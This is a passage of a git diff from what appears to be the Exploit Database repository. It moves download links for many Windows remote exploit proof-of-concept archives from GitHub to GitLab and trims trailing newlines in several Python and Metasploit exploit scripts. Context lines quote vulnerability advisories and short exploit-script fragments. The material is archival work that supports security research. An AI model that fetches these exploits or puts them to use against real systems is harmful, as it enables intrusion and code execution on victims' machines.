are not expected to be released. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33705.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33705.zip \ No newline at end of file diff --git a/exploits/windows/remote/33712.txt b/exploits/windows/remote/33712.txt index c47f9e3e0..91af66e08 100644 --- a/exploits/windows/remote/33712.txt +++ b/exploits/windows/remote/33712.txt @@ -6,4 +6,4 @@ Attackers may leverage this issue to execute arbitrary code in the context of th VLC Media Player 1.0.5 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33712.mp3 \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33712.mp3 \ No newline at end of file diff --git a/exploits/windows/remote/33750.txt b/exploits/windows/remote/33750.txt index 7282307bd..8dc2380fa 100644 --- a/exploits/windows/remote/33750.txt +++ b/exploits/windows/remote/33750.txt @@ -6,4 +6,4 @@ An attacker could exploit this issue by enticing a victim to load help files whe Windows 2000 and XP are vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33750.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33750.zip \ No newline at end of file diff --git a/exploits/windows/remote/33964.txt b/exploits/windows/remote/33964.txt index 8dd025d89..f97a316f3 100644 --- a/exploits/windows/remote/33964.txt +++ b/exploits/windows/remote/33964.txt @@ -6,4 +6,4 @@ Successfully exploiting these issues allows remote attackers to execute arbitrar X-Motor Racing 1.26 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33964.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33964.zip \ No newline at end of file diff --git a/exploits/windows/remote/33980.txt b/exploits/windows/remote/33980.txt index 46702f1d2..86fd83a02 100644 --- a/exploits/windows/remote/33980.txt +++ b/exploits/windows/remote/33980.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to cause applications using the engine to c GEM Engine 2 and GEM Engine 3 are vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33980.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33980.zip \ No newline at end of file diff --git a/exploits/windows/remote/33981.txt b/exploits/windows/remote/33981.txt index 16dbcdaa9..5b360bce2 100644 --- a/exploits/windows/remote/33981.txt +++ b/exploits/windows/remote/33981.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to cause a denial-of-service condition. GameCore 2.5 is vulnerable; other versions may be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33981.dat \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33981.dat \ No newline at end of file diff --git a/exploits/windows/remote/34143.txt b/exploits/windows/remote/34143.txt index 3a75b564a..7e2b9e6e0 100644 --- a/exploits/windows/remote/34143.txt +++ b/exploits/windows/remote/34143.txt @@ -6,4 +6,4 @@ Attackers may leverage this issue to execute arbitrary code in the context of th Versions prior to XnView 1.97.5 are vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34143.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34143.rar \ No newline at end of file diff --git a/exploits/windows/remote/34174.txt b/exploits/windows/remote/34174.txt index adf7f2077..fee130554 100644 --- a/exploits/windows/remote/34174.txt +++ b/exploits/windows/remote/34174.txt @@ -6,4 +6,4 @@ Attackers may leverage this issue to execute arbitrary code in the context of th Enemy Territory: Quake Wars 1.5.12642.33243 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34174.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34174.zip \ No newline at end of file diff --git a/exploits/windows/remote/34178.txt b/exploits/windows/remote/34178.txt index dfc6928c6..2fa443268 100644 --- a/exploits/windows/remote/34178.txt +++ b/exploits/windows/remote/34178.txt @@ -12,4 +12,4 @@ Quake 4 1.4.2 and prior Doom 3 1.3.1 and prior Prey 1.4 and prior -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34178.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34178.zip \ No newline at end of file diff --git a/exploits/windows/remote/34437.txt b/exploits/windows/remote/34437.txt index ca918a8d9..7a22a3da3 100644 --- a/exploits/windows/remote/34437.txt +++ b/exploits/windows/remote/34437.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to create PDF documents containing forged sig All products conforming to the specification for signing PDF documents are affected by this issue. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34437.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34437.tar.gz \ No newline at end of file diff --git a/exploits/windows/remote/34462.txt b/exploits/windows/remote/34462.txt index bf5399baa..c11c3be1e 100644 --- a/exploits/windows/remote/34462.txt +++ b/exploits/windows/remote/34462.txt @@ -4,4 +4,4 @@ The Microsoft Windows implementation of Kerberos is prone to a security-bypass v Successful exploits may allow attackers to gain unauthorized access to affected computers through replay attacks. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34462-2.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34462-2.tar.gz \ No newline at end of file diff --git a/exploits/windows/remote/34647.txt b/exploits/windows/remote/34647.txt index f0d2c49c4..fa5d74232 100644 --- a/exploits/windows/remote/34647.txt +++ b/exploits/windows/remote/34647.txt @@ -1,4 +1,4 @@ -Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34647.zip (aa0day.zip) +Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34647.zip (aa0day.zip) The Revenge of the Scammers diff --git a/exploits/windows/remote/35280.txt b/exploits/windows/remote/35280.txt index 9374bba72..dc6997721 100644 --- a/exploits/windows/remote/35280.txt +++ b/exploits/windows/remote/35280.txt @@ -1,5 +1,5 @@ Source: https://github.com/tyranid/ExploitRemotingService -Exploit Database Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35280.zip +Exploit Database Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35280.zip ExploitRemotingService (c) 2014 James Forshaw ============================================= diff --git a/exploits/windows/remote/35434.txt b/exploits/windows/remote/35434.txt index 7d949b8c3..a388c6730 100644 --- a/exploits/windows/remote/35434.txt +++ b/exploits/windows/remote/35434.txt @@ -4,4 +4,4 @@ WebKit is prone to a cross-domain scripting vulnerability because it fails to pr Successfully exploiting this issue will allow attackers to send the content of arbitrary files from the user's system to a remote server controlled by them. This results in disclosure of potentially sensitive information which may aid in further attacks. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35434.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35434.zip \ No newline at end of file diff --git a/exploits/windows/remote/35560.txt b/exploits/windows/remote/35560.txt index 820da202d..817fdf6d9 100644 --- a/exploits/windows/remote/35560.txt +++ b/exploits/windows/remote/35560.txt @@ -6,6 +6,6 @@ Successfully exploiting these issues allows the attacker to execute arbitrary co InstallerDlg.dll 2.6.0.445 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35560-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35560-2.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35560-3.rb \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35560-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35560-2.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35560-3.rb \ No newline at end of file diff --git a/exploits/windows/remote/35573.txt b/exploits/windows/remote/35573.txt index 2db52fbf7..75a1e69af 100644 --- a/exploits/windows/remote/35573.txt +++ b/exploits/windows/remote/35573.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue by enticing an unsuspecting user to open a spec Successful exploits can allow attackers to execute arbitrary code with the privileges of the user running the application. Failed exploit attempts will result in a denial-of-service condition. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35573.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35573.zip \ No newline at end of file diff --git a/exploits/windows/remote/35885.txt b/exploits/windows/remote/35885.txt index 6e3e8cbef..bc1ee3dff 100644 --- a/exploits/windows/remote/35885.txt +++ b/exploits/windows/remote/35885.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to execute arbitrary code within the context of Ubisoft CoGSManager ActiveX control 1.0.0.23 is vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35885.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35885.zip \ No newline at end of file diff --git a/exploits/windows/remote/35886.txt b/exploits/windows/remote/35886.txt index 79c232a12..0928d0acd 100644 --- a/exploits/windows/remote/35886.txt +++ b/exploits/windows/remote/35886.txt @@ -6,7 +6,7 @@ Attackers may exploit this issue to execute arbitrary code within the context of Sybase Advantage Server 10.0.0.3 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35886.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35886.zip diff --git a/exploits/windows/remote/3634.txt b/exploits/windows/remote/3634.txt index 18ece4b6d..00cc9d20a 100644 --- a/exploits/windows/remote/3634.txt +++ b/exploits/windows/remote/3634.txt @@ -21,6 +21,6 @@ Credit: milw0rm,metasploit, SkyLined, http://doctus.net/ invokes calc.exe if successful -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3634.zip (04012007-Animated_Cursor_Exploit.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3634.zip (04012007-Animated_Cursor_Exploit.zip) # milw0rm.com [2007-04-01] \ No newline at end of file diff --git a/exploits/windows/remote/3635.txt b/exploits/windows/remote/3635.txt index 2f8ad03bd..f9e19f3c3 100644 --- a/exploits/windows/remote/3635.txt +++ b/exploits/windows/remote/3635.txt @@ -22,6 +22,6 @@ after M$ released patch. greets: used SkyLined's idea of exploitation. tnx to him. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3635.zip (04012007-ani.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3635.zip (04012007-ani.zip) # milw0rm.com [2007-04-01] \ No newline at end of file diff --git a/exploits/windows/remote/3636.txt b/exploits/windows/remote/3636.txt index d5cb12c2b..30a1b1b42 100644 --- a/exploits/windows/remote/3636.txt +++ b/exploits/windows/remote/3636.txt @@ -22,6 +22,6 @@ Credit: milw0rm,metasploit, SkyLined, http://doctus.net/ invokes calc.exe if successful -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3636.zip (04012007-exp.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3636.zip (04012007-exp.zip) # milw0rm.com [2007-04-01] \ No newline at end of file diff --git a/exploits/windows/remote/36491.txt b/exploits/windows/remote/36491.txt index b5eb2a424..72eaa5999 100644 --- a/exploits/windows/remote/36491.txt +++ b/exploits/windows/remote/36491.txt @@ -1,6 +1,6 @@ Source: https://github.com/SecurityObscurity/cve-2015-0313 -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36491.zip +PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36491.zip Adobe Flash vulnerability source code (cve-2015-0313) from Angler Exploit Kit diff --git a/exploits/windows/remote/3651.txt b/exploits/windows/remote/3651.txt index 6b2ae880e..46647ea73 100644 --- a/exploits/windows/remote/3651.txt +++ b/exploits/windows/remote/3651.txt @@ -10,6 +10,6 @@ # Microsoft for great coding and Amsterdam (BH07 Europe) party #-------------------------------------------------------------------------------- -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3651.tar.gz (04032007-ie_ani.tar.gz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3651.tar.gz (04032007-ie_ani.tar.gz) # milw0rm.com [2007-04-03] \ No newline at end of file diff --git a/exploits/windows/remote/36542.txt b/exploits/windows/remote/36542.txt index 27810c560..7e358a071 100644 --- a/exploits/windows/remote/36542.txt +++ b/exploits/windows/remote/36542.txt @@ -6,4 +6,4 @@ Successful attacks will allow attackers to execute arbitrary code within the con ExpressView Browser Plug-in 6.5.0.3330 and prior versions are vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36542.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36542.zip \ No newline at end of file diff --git a/exploits/windows/remote/36546.txt b/exploits/windows/remote/36546.txt index b97ebe6a7..be620d1d2 100644 --- a/exploits/windows/remote/36546.txt +++ b/exploits/windows/remote/36546.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue may allow attackers to execute arbitrary code GreenBrowser 6.0.1002 and prior versions are vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36546.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36546.rar \ No newline at end of file diff --git a/exploits/windows/remote/36829.txt b/exploits/windows/remote/36829.txt index db13bf448..2efe93d19 100644 --- a/exploits/windows/remote/36829.txt +++ b/exploits/windows/remote/36829.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow remote attackers to execute arbitrary code or R2/Extreme 1.65 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36829.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36829.zip \ No newline at end of file diff --git a/exploits/windows/remote/3746.txt b/exploits/windows/remote/3746.txt index 5d8557d57..58c47a5db 100644 --- a/exploits/windows/remote/3746.txt +++ b/exploits/windows/remote/3746.txt @@ -52,6 +52,6 @@ also available at http://514.es/Microsoft_Dns_Server_Exploit_v2.1.zip http://www.48bits.com/exploits/dnsxpl.v2.1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3746.zip (04172007-dnsxpl.v2.1.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3746.zip (04172007-dnsxpl.v2.1.zip) # milw0rm.com [2007-04-18] \ No newline at end of file diff --git a/exploits/windows/remote/37840.txt b/exploits/windows/remote/37840.txt index c1066187d..45bb730b6 100644 --- a/exploits/windows/remote/37840.txt +++ b/exploits/windows/remote/37840.txt @@ -14,4 +14,4 @@ The PoC writes calc.bat to startup folder. It has been tested by injecting the d Jietao Yang of KeenTeam (@K33nTeam) is credited for the vulnerability. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37840.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37840.zip \ No newline at end of file diff --git a/exploits/windows/remote/37841.txt b/exploits/windows/remote/37841.txt index 85e42c034..3bddc6f89 100644 --- a/exploits/windows/remote/37841.txt +++ b/exploits/windows/remote/37841.txt @@ -15,4 +15,4 @@ Jietao Yang and Jihui Lu of KeenTeam (@K33nTeam) is credited for the vulnerabili Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37841.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37841.zip \ No newline at end of file diff --git a/exploits/windows/remote/37842.txt b/exploits/windows/remote/37842.txt index 90281f53a..19fb1d132 100644 --- a/exploits/windows/remote/37842.txt +++ b/exploits/windows/remote/37842.txt @@ -13,4 +13,4 @@ The PoC writes calc.bat to startup folder. It has been tested by injecting the d 2. Credit Jihui Lu of KeenTeam (@K33nTeam) is credited for the vulnerability. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37842.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37842.zip \ No newline at end of file diff --git a/exploits/windows/remote/3804.txt b/exploits/windows/remote/3804.txt index 609884b84..3bfa416bc 100644 --- a/exploits/windows/remote/3804.txt +++ b/exploits/windows/remote/3804.txt @@ -1,5 +1,5 @@ MS Windows (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017) -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3804.zip (04262007-gdi_remote_elevation_privilege_exploit_ms07_017_principal.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3804.zip (04262007-gdi_remote_elevation_privilege_exploit_ms07_017_principal.zip) # milw0rm.com [2007-04-26] \ No newline at end of file diff --git a/exploits/windows/remote/38384.txt b/exploits/windows/remote/38384.txt index 5163ce655..a3dc07110 100644 --- a/exploits/windows/remote/38384.txt +++ b/exploits/windows/remote/38384.txt @@ -9,4 +9,4 @@ $ sudo openssl s_server -key key.pem -cert cert.pem -accept 443 Then visit that https server from a machine with Avast installed. Click the message that appears to demonstrate launching calc.exe. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38384.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38384.zip \ No newline at end of file diff --git a/exploits/windows/remote/38644.txt b/exploits/windows/remote/38644.txt index 355af9da0..dd6ee20a2 100644 --- a/exploits/windows/remote/38644.txt +++ b/exploits/windows/remote/38644.txt @@ -28,4 +28,4 @@ Please note that a manager restart will be needed before you can login with the can be accomplished by running "/etc/init.d/contego-manager restart" Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38644.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38644.zip \ No newline at end of file diff --git a/exploits/windows/remote/38742.txt b/exploits/windows/remote/38742.txt index 55c57f492..7555a059e 100644 --- a/exploits/windows/remote/38742.txt +++ b/exploits/windows/remote/38742.txt @@ -4,4 +4,4 @@ Aloaha PDF Suite is prone to a stack-based buffer-overflow vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely cause denial-of-service conditions. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/62036.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/62036.zip \ No newline at end of file diff --git a/exploits/windows/remote/38918.txt b/exploits/windows/remote/38918.txt index 43f8d0623..63cf8047f 100644 --- a/exploits/windows/remote/38918.txt +++ b/exploits/windows/remote/38918.txt @@ -44,4 +44,4 @@ It is also possible to trigger this DLL load without a user click with the follo Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38918.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38918.zip \ No newline at end of file diff --git a/exploits/windows/remote/38968.txt b/exploits/windows/remote/38968.txt index d0558460e..3a9d255b2 100644 --- a/exploits/windows/remote/38968.txt +++ b/exploits/windows/remote/38968.txt @@ -93,4 +93,4 @@ It is also possible to trigger this DLL load without requiring a user click by u Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38968.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38968.zip \ No newline at end of file diff --git a/exploits/windows/remote/39161.py b/exploits/windows/remote/39161.py index 3339499b5..a6862c239 100755 --- a/exploits/windows/remote/39161.py +++ b/exploits/windows/remote/39161.py @@ -46,4 +46,4 @@ try: except: print """[.]Something went wrong..! Usage is :[.] python exploit.py <Target IP address> <Target Port Number> - Don't forgot to change the Local IP address and Port number on the script""" + Don't forgot to change the Local IP address and Port number on the script""" \ No newline at end of file diff --git a/exploits/windows/remote/39599.txt b/exploits/windows/remote/39599.txt index 15d39b5b1..0a22d1b0d 100644 --- a/exploits/windows/remote/39599.txt +++ b/exploits/windows/remote/39599.txt @@ -109,4 +109,4 @@ Any secrets stored in the registry are also exposed to attackers via RegQueryVal Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39599.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39599.zip \ No newline at end of file diff --git a/exploits/windows/remote/39805.txt b/exploits/windows/remote/39805.txt index 03175fdd4..43baadc54 100644 --- a/exploits/windows/remote/39805.txt +++ b/exploits/windows/remote/39805.txt @@ -20,6 +20,6 @@ file is: "MS-Windows-Media-Center-May-2016-RCE-POC--Password-is-mcl.zip" Password: mcl EDB PoC Mirror: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39805.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39805.zip I am also attaching the file as "MS-Windows-Media-Center-May-2016-RCE-POC--Password-is-mcl[dot]zip.txt" (extension is txt, but it is an actual .ZIP archive, so rename to ".ZIP" upon downloading it). Archive opens successfully on any Windows version. \ No newline at end of file diff --git a/exploits/windows/remote/40990.txt b/exploits/windows/remote/40990.txt index 8ae7528d1..c2760f976 100644 --- a/exploits/windows/remote/40990.txt +++ b/exploits/windows/remote/40990.txt @@ -1,6 +1,6 @@ Source: https://github.com/theori-io/chakra-2016-11 -Proofs of Concept: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40990.zip +Proofs of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40990.zip chakra.dll Info Leak + Type Confusion for RCE diff --git a/exploits/windows/remote/41073.py b/exploits/windows/remote/41073.py index 4899bdc70..059d22884 100755 --- a/exploits/windows/remote/41073.py +++ b/exploits/windows/remote/41073.py @@ -54,9 +54,4 @@ print 'Listening on LPD port: '+str(port) while True: conn, addr = s.accept() conn.send(buffer) - conn.close() - - - - - + conn.close() \ No newline at end of file diff --git a/exploits/windows/remote/41479.py b/exploits/windows/remote/41479.py index cb2d86e8b..6531c5728 100755 --- a/exploits/windows/remote/41479.py +++ b/exploits/windows/remote/41479.py @@ -64,4 +64,4 @@ print(len(rev_met_2)) while True: conn, addr = s.accept() conn.send('220 '+buffer+'ESMTP Sendmail \r\n') - conn.close() + conn.close() \ No newline at end of file diff --git a/exploits/windows/remote/41545.py b/exploits/windows/remote/41545.py index fd1905992..b8c106554 100755 --- a/exploits/windows/remote/41545.py +++ b/exploits/windows/remote/41545.py @@ -64,4 +64,4 @@ elif len(rev_met_2) >= 76: while True: conn, addr = s.accept() conn.send('220 '+buffer+'\r\n') - conn.close() + conn.close() \ No newline at end of file diff --git a/exploits/windows/remote/418.c b/exploits/windows/remote/418.c index 69834748b..be8bf5487 100644 --- a/exploits/windows/remote/418.c +++ b/exploits/windows/remote/418.c @@ -2,7 +2,7 @@ This 0day exploit is known to be circulating in the wild There is no patch for this vulnerability -> Do not use Winamp ! -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/418.rar (skinhead.rar - 171 Ko) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/418.rar (skinhead.rar - 171 Ko) index.html diff --git a/exploits/windows/remote/4188.txt b/exploits/windows/remote/4188.txt index feb635c7f..d9b6c01f7 100644 --- a/exploits/windows/remote/4188.txt +++ b/exploits/windows/remote/4188.txt @@ -2,6 +2,6 @@ Author:(yunshu) http://www.ph4nt0m.org poc: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4188.zip (07162007-flash_flv_9.0.45.0_exp.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4188.zip (07162007-flash_flv_9.0.45.0_exp.zip) # milw0rm.com [2007-07-16] \ No newline at end of file diff --git a/exploits/windows/remote/41894.py b/exploits/windows/remote/41894.py index 2cf5f50c4..eb5688f65 100755 --- a/exploits/windows/remote/41894.py +++ b/exploits/windows/remote/41894.py @@ -3,7 +3,7 @@ ## Exploit toolkit CVE-2017-0199 - v4.0 (https://github.com/bhdresh/CVE-2017-0199) ## -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41894.zip +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41894.zip ''' import os,sys,thread,socket,sys,getopt,binascii,shutil,tempfile from random import randint diff --git a/exploits/windows/remote/41903.txt b/exploits/windows/remote/41903.txt index 2ddc9452c..c896b6872 100644 --- a/exploits/windows/remote/41903.txt +++ b/exploits/windows/remote/41903.txt @@ -42,4 +42,4 @@ A copy of CMD and Notepad is executed on the server in the context of the callin Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41903.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41903.zip \ No newline at end of file diff --git a/exploits/windows/remote/41975.txt b/exploits/windows/remote/41975.txt index 51bc76540..0a60ea351 100644 --- a/exploits/windows/remote/41975.txt +++ b/exploits/windows/remote/41975.txt @@ -126,4 +126,4 @@ We have verified that on Windows 10, adding a blanket exception for C:\ is enoug Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41975.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41975.zip \ No newline at end of file diff --git a/exploits/windows/remote/42315.py b/exploits/windows/remote/42315.py index 1e82858fd..4c56f8237 100755 --- a/exploits/windows/remote/42315.py +++ b/exploits/windows/remote/42315.py @@ -9,7 +9,7 @@ import time ''' MS17-010 exploit for Windows 2000 and later by sleepya -EDB Note: mysmb.py can be found here ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42315.py +EDB Note: mysmb.py can be found here ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42315.py Note: - The exploit should never crash a target (chance should be nearly 0%) diff --git a/exploits/windows/remote/42557.py b/exploits/windows/remote/42557.py index 86faea782..9760dcb95 100755 --- a/exploits/windows/remote/42557.py +++ b/exploits/windows/remote/42557.py @@ -93,4 +93,4 @@ packet += "Connection: keep-alive\r\n" packet += "Referer: http://pyramidcyber.com\r\n" packet += "\r\n" s.send(packet) -s.close() +s.close() \ No newline at end of file diff --git a/exploits/windows/remote/42558.py b/exploits/windows/remote/42558.py index 579051b9a..a996d1236 100755 --- a/exploits/windows/remote/42558.py +++ b/exploits/windows/remote/42558.py @@ -93,4 +93,4 @@ packet += "Connection: keep-alive\r\n" packet += "Referer: http://pyramidcyber.com\r\n" packet += "\r\n" s.send(packet) -s.close() +s.close() \ No newline at end of file diff --git a/exploits/windows/remote/42559.py b/exploits/windows/remote/42559.py index efe341c05..43b3d4d09 100755 --- a/exploits/windows/remote/42559.py +++ b/exploits/windows/remote/42559.py @@ -93,4 +93,4 @@ packet += "Connection: keep-alive\r\n" packet += "Referer: http://pyramidcyber.com\r\n" packet += "\r\n" s.send(packet) -s.close() +s.close() \ No newline at end of file diff --git a/exploits/windows/remote/42560.py b/exploits/windows/remote/42560.py index 90134784b..15c8fe9a6 100755 --- a/exploits/windows/remote/42560.py +++ b/exploits/windows/remote/42560.py @@ -93,4 +93,4 @@ packet += "Connection: keep-alive\r\n" packet += "Referer: http://pyramidcyber.com\r\n" packet += "\r\n" s.send(packet) -s.close() +s.close() \ No newline at end of file diff --git a/exploits/windows/remote/42691.rb b/exploits/windows/remote/42691.rb index 399a78ee4..deb8ed7d3 100755 --- a/exploits/windows/remote/42691.rb +++ b/exploits/windows/remote/42691.rb @@ -65,4 +65,4 @@ class MetasploitModule < Msf::Exploit::Remote service.close_client(client) end -end +end \ No newline at end of file diff --git a/exploits/windows/remote/42693.rb b/exploits/windows/remote/42693.rb index e6c49b95f..cc50d2e22 100755 --- a/exploits/windows/remote/42693.rb +++ b/exploits/windows/remote/42693.rb @@ -70,4 +70,4 @@ class MetasploitModule < Msf::Exploit::Remote service.close_client(client) end -end +end \ No newline at end of file diff --git a/exploits/windows/remote/42694.rb b/exploits/windows/remote/42694.rb index d279202e7..70322006a 100755 --- a/exploits/windows/remote/42694.rb +++ b/exploits/windows/remote/42694.rb @@ -97,4 +97,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/exploits/windows/remote/42696.rb b/exploits/windows/remote/42696.rb index 79f6f2b3c..67f8d4573 100755 --- a/exploits/windows/remote/42696.rb +++ b/exploits/windows/remote/42696.rb @@ -81,4 +81,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/exploits/windows/remote/42700.rb b/exploits/windows/remote/42700.rb index f27af4abd..345ba22a1 100755 --- a/exploits/windows/remote/42700.rb +++ b/exploits/windows/remote/42700.rb @@ -68,4 +68,4 